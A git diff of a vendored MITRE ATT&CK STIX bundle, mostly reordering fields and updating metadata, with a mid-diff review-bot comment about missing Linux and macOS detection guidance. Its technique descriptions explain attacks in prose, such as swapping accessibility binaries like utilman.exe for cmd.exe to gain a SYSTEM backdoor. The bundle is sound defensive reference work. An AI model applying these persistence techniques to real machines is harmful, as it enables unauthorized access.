diff --git a/atomic_red_team/enterprise-attack.json b/atomic_red_team/enterprise-attack.json
index c07df17b..e1d2da04 100644
--- a/atomic_red_team/enterprise-attack.json
+++ b/atomic_red_team/enterprise-attack.json
@@ -1,6 +1,6 @@
{
"type": "bundle",
- "id": "bundle--16b0b40c-d9c3-46d4-97cc-11e94143ab9c",
+ "id": "bundle--4ee91158-54a2-4744-8722-be32f062b9e8",
"spec_version": "2.0",
"objects": [
{
@@ -56,23 +56,23 @@
],
"modified": "2020-03-24T16:28:04.990Z",
"created": "2020-01-24T14:13:45.936Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
+ "x_mitre_detection": "While users may customize their ~/.bashrc and ~/.bash_profile files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.",
"x_mitre_data_sources": [
"Process use of network",
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "While users may customize their ~/.bashrc and ~/.bash_profile files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -108,15 +108,15 @@
],
"modified": "2020-03-20T15:56:55.022Z",
"created": "2020-02-11T18:46:56.263Z",
- "x_mitre_platforms": [
- "Linux"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
+ "x_mitre_detection": "The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs.",
"x_mitre_permissions_required": [
"root"
],
- "x_mitre_detection": "The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs."
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux"
+ ]
},
{
"external_references": [
@@ -144,26 +144,26 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T12:18:44.286Z",
+ "modified": "2020-06-25T19:57:54.923Z",
"created": "2020-01-30T13:58:14.373Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).\n\nConsider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.\n\nOn Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.\n\nThere are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
"x_mitre_data_sources": [
"Windows Registry",
"File monitoring",
"Process command-line parameters",
"API monitoring",
"Process monitoring"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).\n\nConsider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.\n\nOn Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.\n\nThere are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -227,19 +227,23 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T21:55:15.343Z",
+ "modified": "2020-04-16T19:37:02.355Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Windows User Account Control",
+ "System access controls",
+ "File system access controls",
+ "Heuristic Detection",
+ "Host forensic analysis"
],
- "x_mitre_effective_permissions": [
- "SYSTEM"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.0",
+ "x_mitre_contributors": [
+ "Tom Ueltschi @c_APT_ure",
+ "Travis Smith, Tripwire",
+ "Robby Winchester, @robwinchester3",
+ "Jared Atkinson, @jaredcatkinson"
],
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \n\nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\n\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.",
"x_mitre_data_sources": [
"Authentication logs",
"Windows event logs",
@@ -248,20 +252,16 @@
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_contributors": [
- "Tom Ueltschi @c_APT_ure",
- "Travis Smith, Tripwire",
- "Robby Winchester, @robwinchester3",
- "Jared Atkinson, @jaredcatkinson"
+ "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \n\nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\n\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
- "x_mitre_version": "2.0",
- "x_mitre_is_subtechnique": false,
- "x_mitre_defense_bypassed": [
- "Windows User Account Control",
- "System access controls",
- "File system access controls",
- "Heuristic Detection",
- "Host forensic analysis"
+ "x_mitre_effective_permissions": [
+ "SYSTEM"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -278,7 +278,7 @@
},
{
"url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
- "description": "Glyer, C., Kazanciyan, R. (2012, August 20). THE \u201cHIKIT\u201d ROOTKIT: ADVANCED AND PERSISTENT ATTACK TECHNIQUES (PART 1). Retrieved June 6, 2016.",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.",
"source_name": "FireEye Hikit Rootkit"
},
{
@@ -296,7 +296,7 @@
"id": "attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3",
"revoked": true,
"type": "attack-pattern",
- "modified": "2020-01-24T14:33:05.640Z",
+ "modified": "2020-05-13T20:37:30.008Z",
"created": "2017-05-31T21:30:26.946Z"
},
{
@@ -313,7 +313,7 @@
},
{
"url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
- "description": "Glyer, C., Kazanciyan, R. (2012, August 20). THE \u201cHIKIT\u201d ROOTKIT: ADVANCED AND PERSISTENT ATTACK TECHNIQUES (PART 1). Retrieved June 6, 2016.",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.",
"source_name": "FireEye Hikit Rootkit"
},
{
@@ -325,6 +325,11 @@
"url": "http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/",
"description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.",
"source_name": "Tilbury 2014"
+ },
+ {
+ "source_name": "Narrator Accessibility Abuse",
+ "url": "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html",
+ "description": "Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020."
}
],
"object_marking_refs": [
@@ -332,7 +337,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Accessibility Features",
- "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). 
Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe",
+ "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). 
Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe",
"id": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -345,29 +350,29 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-24T19:11:19.022Z",
+ "modified": "2020-05-13T20:37:30.048Z",
"created": "2020-01-24T14:32:40.315Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "SYSTEM"
],
- "x_mitre_contributors": [
- "Paul Speulstra, AECOM Global Security Operations Center"
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring",
"Windows Registry"
],
- "x_mitre_detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_contributors": [
+ "Paul Speulstra, AECOM Global Security Operations Center"
],
- "x_mitre_effective_permissions": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -401,17 +406,13 @@
"phase_name": "impact"
}
],
- "modified": "2019-10-14T23:29:24.908Z",
+ "modified": "2020-07-14T19:15:29.911Z",
"created": "2019-10-09T18:48:31.906Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Windows event logs",
- "Process command-line parameters",
- "Process monitoring"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:\n\n* Event ID 4723 - An attempt was made to change an account's password\n* Event ID 4724 - An attempt was made to reset an account's password\n* Event ID 4726 - A user account was deleted\n* Event ID 4740 - A user account was locked out\n\nAlerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.",
+ "x_mitre_version": "1.0",
+ "x_mitre_impact_type": [
+ "Availability"
],
"x_mitre_permissions_required": [
"User",
@@ -419,11 +420,16 @@
"root",
"SYSTEM"
],
- "x_mitre_impact_type": [
- "Availability"
+ "x_mitre_data_sources": [
+ "Windows event logs",
+ "Process command-line parameters",
+ "Process monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:\n\n* Event ID 4723 - An attempt was made to change an account's password\n* Event ID 4724 - An attempt was made to reset an account's password\n* Event ID 4726 - A user account was deleted\n* Event ID 4740 - A user account was locked out\n\nAlerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible."
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08",
@@ -449,22 +455,7 @@
],
"modified": "2020-03-26T15:27:59.127Z",
"created": "2017-05-31T21:31:06.988Z",
- "x_mitre_version": "2.1",
- "x_mitre_contributors": [
- "Microsoft Threat Intelligence Center (MSTIC)",
- "Travis Smith, Tripwire"
- ],
- "x_mitre_data_sources": [
- "Azure activity logs",
- "Office 365 account logs",
- "API monitoring",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -476,7 +467,22 @@
"Azure",
"SaaS"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "Azure activity logs",
+ "Office 365 account logs",
+ "API monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_contributors": [
+ "Microsoft Threat Intelligence Center (MSTIC)",
+ "Travis Smith, Tripwire"
+ ],
+ "x_mitre_version": "2.1"
},
{
"object_marking_refs": [
@@ -520,28 +526,30 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-28T21:11:58.156Z",
+ "modified": "2020-07-15T12:43:37.469Z",
"created": "2017-05-31T21:31:12.196Z",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.1",
+ "x_mitre_contributors": [
+ "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)",
+ "Praetorian",
+ "Tim MalcomVetter"
+ ],
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "Windows event logs"
+ ],
+ "x_mitre_detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\n\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.",
"x_mitre_platforms": [
"Windows",
"Office 365",
"Azure",
"GCP",
"Azure AD",
- "AWS"
- ],
- "x_mitre_detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\n\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.",
- "x_mitre_data_sources": [
- "Authentication logs",
- "Windows event logs"
- ],
- "x_mitre_contributors": [
- "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)",
- "Praetorian",
- "Tim MalcomVetter"
- ],
- "x_mitre_version": "2.1",
- "x_mitre_is_subtechnique": false
+ "AWS",
+ "Linux",
+ "macOS"
+ ]
},
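Review bot: The new side of this hunk adds "Linux" and "macOS" to x_mitre_platforms for this account-manipulation entry, but x_mitre_data_sources still lists only `"Authentication logs"` and `"Windows event logs"`, and the x_mitre_detection text is entirely Windows-specific (event IDs 4738, 4728, 4670), so the expanded platform claim has no matching detection guidance. If this is a vendored copy of the upstream ATT&CK STIX bundle the gap belongs upstream, but the inconsistency is worth noting before relying on this entry for Linux/macOS coverage; an earlier entry in this same file already describes the natural approach (auditd watching /etc/passwd and /etc/shadow). A minimal fix would add `"File monitoring"` and `"Process command-line parameters"` to x_mitre_data_sources and append a sentence to x_mitre_detection along the lines of `On Linux and macOS, monitor modification of /etc/passwd, /etc/shadow, /etc/group and local directory services (e.g. via auditd or file integrity monitoring) and invocation of account-management utilities such as usermod, passwd, chpasswd and dscl.` Separately, the detection string cites `(Citation: Microsoft Security Event 4670)` twice in a row; the second occurrence looks like a copy-paste duplicate and can be dropped.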
{
"external_references": [
@@ -577,21 +585,21 @@
],
"modified": "2020-03-24T12:40:02.331Z",
"created": "2020-01-19T16:59:45.362Z",
- "x_mitre_platforms": [
- "Office 365"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ",
+ "x_mitre_data_sources": [
+ "Office 365 audit logs"
],
"x_mitre_contributors": [
"Microsoft Threat Intelligence Center (MSTIC)"
],
- "x_mitre_data_sources": [
- "Office 365 audit logs"
- ],
- "x_mitre_detection": "Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -637,23 +645,23 @@
],
"modified": "2020-03-26T17:34:02.877Z",
"created": "2019-11-07T19:52:52.801Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior",
"x_mitre_data_sources": [
"Process command-line parameters",
"File monitoring",
"Windows Registry",
"Process monitoring"
],
- "x_mitre_detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -702,24 +710,25 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-28T21:11:57.894Z",
+ "modified": "2020-07-15T12:43:36.340Z",
"created": "2020-01-19T16:10:15.008Z",
- "x_mitre_platforms": [
- "Azure AD",
- "Azure"
- ],
"x_mitre_contributors": [
+ "Oleg Kolesnikov, Securonix",
"Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"
],
- "x_mitre_data_sources": [
- "Azure activity logs"
- ],
- "x_mitre_detection": "Monitor Azure Activity Logs for service principal modifications.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor Azure Activity Logs for service principal modifications.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.",
+ "x_mitre_data_sources": [
+ "Azure activity logs"
+ ],
+ "x_mitre_platforms": [
+ "Azure AD",
+ "Azure"
+ ]
},
{
"id": "attack-pattern--4bf5845d-a814-4490-bc5c-ccdee6043025",
@@ -794,26 +803,26 @@
],
"modified": "2020-03-24T20:22:45.298Z",
"created": "2020-01-24T14:47:41.795Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
"x_mitre_data_sources": [
"Windows Registry",
"Process command-line parameters",
"Process monitoring",
"Loaded DLLs"
],
